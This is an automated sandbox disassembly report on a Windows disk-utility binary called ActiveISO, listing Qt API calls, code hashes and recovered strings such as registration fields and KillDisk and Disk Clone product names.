                                                                                                                  • API ID: String@@$Settings@@$?fromArrayAscii_helper@Data@Typed$?setString@@@Variant@@$?beginCodec@Format@0@Group@Object@@@V0@@Value@Variant@@@
                                                                                                                  • String ID: RegUser
                                                                                                                  • API String ID: 3384771880-1458091071
                                                                                                                  • Opcode ID: 2b1fd9e2640552e6b2bb5a3d4b5cf9eeeebe01bc0964bc799380eab4cde1d2e2
                                                                                                                  • Instruction ID: a4b645d404a743444daeb427a1be17c491ffcf3212a0b8e8871bc931fb05ae1b
                                                                                                                  • Opcode Fuzzy Hash: 2b1fd9e2640552e6b2bb5a3d4b5cf9eeeebe01bc0964bc799380eab4cde1d2e2
                                                                                                                  • Instruction Fuzzy Hash: EF117731D18A4292EB10CB60F8450AA7722FFC4F61F481231E19EB66B4DF3CD549CB44
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@CaseData@Exp@@PatternQt@@Sensitivity@Syntax@0@@Typed$Object@@@Validator@@
                                                                                                                  • String ID: [a-z0-9._%+-]*@?[a-z0-9.-]*\.?[a-z]*$[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}
                                                                                                                  • API String ID: 406253590-2097209201
                                                                                                                  • Opcode ID: 6ad7959c49bada8062edb7ab080a7c6fa09a5d068bca56eeee8cbd19714b4224
                                                                                                                  • Instruction ID: 9825add58b7e40e887662c3a4efb0b6a8f6b4ce1c78daa11012d78f2070f2c12
                                                                                                                  • Opcode Fuzzy Hash: 6ad7959c49bada8062edb7ab080a7c6fa09a5d068bca56eeee8cbd19714b4224
                                                                                                                  • Instruction Fuzzy Hash: DD110432A28F4296E710CFA0F8550697372FB99B20F844230D96EA6AB4EF3CD50CC744
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$V0@@$?append@Array@@ByteV1@@$?application?fromApplication@@CoreDir@@NativePath@Separators@Utf8@V2@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3915880945-0
                                                                                                                  • Opcode ID: f81f03da49ab8734a37cdba4e428f197a9149b564c023e6610b4f9ef417b44e7
                                                                                                                  • Instruction ID: 9d3765bf6050434967bbc9051dcf3f9c0bddf2e641e043a1b5a2629562282117
                                                                                                                  • Opcode Fuzzy Hash: f81f03da49ab8734a37cdba4e428f197a9149b564c023e6610b4f9ef417b44e7
                                                                                                                  • Instruction Fuzzy Hash: 90218772D28A0692E610DB51E8960BA6322FF91F91F490131E55FF6AB4DF2CE54CC784
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653743450: ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF65374347C
                                                                                                                    • Part of subcall function 00007FF653743450: ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF653743486
                                                                                                                    • Part of subcall function 00007FF653743450: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537434A3
                                                                                                                    • Part of subcall function 00007FF653743450: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537434AF
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374351B
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653743531
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653743563
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@$?data@Latin1@
                                                                                                                  • String ID: Corporate$Enterprise$General$Personal$Site
                                                                                                                  • API String ID: 668302157-1993664377
                                                                                                                  • Opcode ID: dc80c2c60f58e766d1bec8f72fef8afd82d536303f993325618a617327893b6b
                                                                                                                  • Instruction ID: d1332848d91be8ed1caca39b1c2a00eadc196b4d08d2e7d6239ee38181b2e551
                                                                                                                  • Opcode Fuzzy Hash: dc80c2c60f58e766d1bec8f72fef8afd82d536303f993325618a617327893b6b
                                                                                                                  • Instruction Fuzzy Hash: 9A017C65E7850381FA1A4B7CA41B6745312EB45F70F9C1231CC9DB66A4CE2CF264C608
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537425FB
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374261E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742631
                                                                                                                  • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374264B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742657
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742663
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374266F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@$?fromArrayAscii_helper@Data@Typed$?setString@@@Variant@@$?beginCodec@Format@0@Group@Object@@@Value@Variant@@@
                                                                                                                  • String ID: RegEmail
                                                                                                                  • API String ID: 1725730331-1580192543
                                                                                                                  • Opcode ID: 3f5d276f69823a93d360e4638c860f55eab55e5c8d69889f883b046ea74def94
                                                                                                                  • Instruction ID: 36f13cbf78dc18d17f4cc4a7d5fb58795683cb2a73d49092286bf4169c67993c
                                                                                                                  • Opcode Fuzzy Hash: 3f5d276f69823a93d360e4638c860f55eab55e5c8d69889f883b046ea74def94
                                                                                                                  • Instruction Fuzzy Hash: 31016532E28A4192EB10CB60F8450AA7722FBC5B61F481231E29EA66B4DF3CD54DCB44
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Evaluation$KillDisk Industrial Software$www.killdisk.com
                                                                                                                  • API String ID: 2577116290-2757394197
                                                                                                                  • Opcode ID: f9b8dcce8868aad160b515c8b29fdce622cf7469bdf48c5a350e2aeb73b7f558
                                                                                                                  • Instruction ID: 5228dd6de008d6e4c42e5fbd5773238fea730d59114f2e0901d9303c9726994f
                                                                                                                  • Opcode Fuzzy Hash: f9b8dcce8868aad160b515c8b29fdce622cf7469bdf48c5a350e2aeb73b7f558
                                                                                                                  • Instruction Fuzzy Hash: 7DF03661E29947E1EB108B64E8564B42332FF44FA8B8C1031E54EB6974DF2CE589C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Evaluation$KillDisk Desktop$www.killdesk.com
                                                                                                                  • API String ID: 2577116290-956001340
                                                                                                                  • Opcode ID: 0a33d2c570ced31d8abbfefeeea5e04a971a442cc53811a66498b0fc8bcf7db9
                                                                                                                  • Instruction ID: 77bb58175d3edcb9f72e3e10dcd9d119ae9f04b443c7c5432aac4db075b1ea09
                                                                                                                  • Opcode Fuzzy Hash: 0a33d2c570ced31d8abbfefeeea5e04a971a442cc53811a66498b0fc8bcf7db9
                                                                                                                  • Instruction Fuzzy Hash: 2AF03661E28947E1FB108B64E8564B42332FF44FA9F8C1031E54EB6974DF2CE589C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Evaluation$KillDisk Industrial System$www.killdisk.com
                                                                                                                  • API String ID: 2577116290-435737599
                                                                                                                  • Opcode ID: 5d788b1a20005e830c8e8e723f1ab0461f1008ca1c76e026b351d1a12ad3c25b
                                                                                                                  • Instruction ID: 93a92514252f32547a86ecbf672c27721f58c906937600b5e445aff2754fc54b
                                                                                                                  • Opcode Fuzzy Hash: 5d788b1a20005e830c8e8e723f1ab0461f1008ca1c76e026b351d1a12ad3c25b
                                                                                                                  • Instruction Fuzzy Hash: CCF03661E28947E1EB108B64E8564B42332FF44FA9B8C1031E54EB65B4DF2CE589C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Disk Clone Industrial$Evaluation$www.disk-clone.com
                                                                                                                  • API String ID: 2577116290-1708917734
                                                                                                                  • Opcode ID: 9489e9240cd40c10e383f44fdfc7e8738c844fe4b3c74d92dae18716f429701a
                                                                                                                  • Instruction ID: 8a7fdb6d9e7515791d0b3c9acc0730cb4d608164df15433a642f5ea61939b21e
                                                                                                                  • Opcode Fuzzy Hash: 9489e9240cd40c10e383f44fdfc7e8738c844fe4b3c74d92dae18716f429701a
                                                                                                                  • Instruction Fuzzy Hash: 20F03161E29947E1EB008B24E8964B42332FB44FA8B8C1131E54EB7974DF2CE18AC748
                                                                                                                  APIs
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(2AAAAAAAAAAAAAAB,?,?,?,00000000,00000001,?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714869
                                                                                                                    • Part of subcall function 00007FF653714110: ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FF653714823,2AAAAAAAAAAAAAAB,?,?,?,00000000,00000001), ref: 00007FF653714130
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(2AAAAAAAAAAAAAAB,?,?,?,00000000,00000001,?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714888
                                                                                                                  • ?qBadAlloc@@YAXXZ.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF65371489B
                                                                                                                  • ??0QString@@QEAA@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF65371491F
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF6537149CE
                                                                                                                  • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(2AAAAAAAAAAAAAAB,?,?,?,00000000,00000001,?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A04
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A5D
                                                                                                                  • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A74
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array$Data@@$U1@_$?allocate@?deallocate@?sharedA@$$Alloc@@AllocationData@@@@@Flags@Null@Option@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3930579913-0
                                                                                                                  • Opcode ID: ac427a3e7907d2bddeba7ad6c0b61f0ebbca661715a4e7acad1795cda2c2fcef
                                                                                                                  • Instruction ID: ca5b5e6b5221e28727b89b33b90767584c985bd788caefbaf0b010aad84377da
                                                                                                                  • Opcode Fuzzy Hash: ac427a3e7907d2bddeba7ad6c0b61f0ebbca661715a4e7acad1795cda2c2fcef
                                                                                                                  • Instruction Fuzzy Hash: 8B91A073E15A9183EA20CF15E59616D73B1FB48B94B4A8231DB5EA3B50EF38E491C344
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 11479020-0
                                                                                                                  • Opcode ID: 632f6e36f1386884fceb51ca6f81cbe33df16534a8ec3872c675c9e37a95668a
                                                                                                                  • Instruction ID: 2175fbf0827b5c8cf13e97c68a584b6017da9c8fe3c7edfe6fea93f05eb0572d
                                                                                                                  • Opcode Fuzzy Hash: 632f6e36f1386884fceb51ca6f81cbe33df16534a8ec3872c675c9e37a95668a
                                                                                                                  • Instruction Fuzzy Hash: AD317022F28B4295FB00DBA1D8820AD6372FB45F94B4C4135DA5EF76A5DF2CE519C344
                                                                                                                  APIs
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF65372540A
                                                                                                                  • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF65372541E
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF65372542F
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF653725441
                                                                                                                    • Part of subcall function 00007FF653714730: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FF653714359), ref: 00007FF653714767
                                                                                                                  • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF653725465
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF653725471
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF6537254D7
                                                                                                                  • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF6537254E5
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653724011), ref: 00007FF6537254EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach_grow@?dispose@?end@Array@@ByteData@1@Data@1@@String@@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1589640367-0
                                                                                                                  • Opcode ID: 1912f3ad79facc5f99d9eeeb428bc456fc2a1ad3181920cdb0f76ba7f08fe0b3
                                                                                                                  • Instruction ID: 2e543f87aafb71190df2a553de06cf707b65e5f00caa39646e51db7992e213bf
                                                                                                                  • Opcode Fuzzy Hash: 1912f3ad79facc5f99d9eeeb428bc456fc2a1ad3181920cdb0f76ba7f08fe0b3
                                                                                                                  • Instruction Fuzzy Hash: 9F31D132E25A4385EA208B62A9811B9A762FF85FE6F484530DE0EB3364DF3CD545CB04
                                                                                                                  APIs
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537451DA
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537451F2
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65374520A
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65374521F
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653745234
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QWizard@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653749903
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653749923
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65374992E
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653749940
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653749951
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749972
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749982
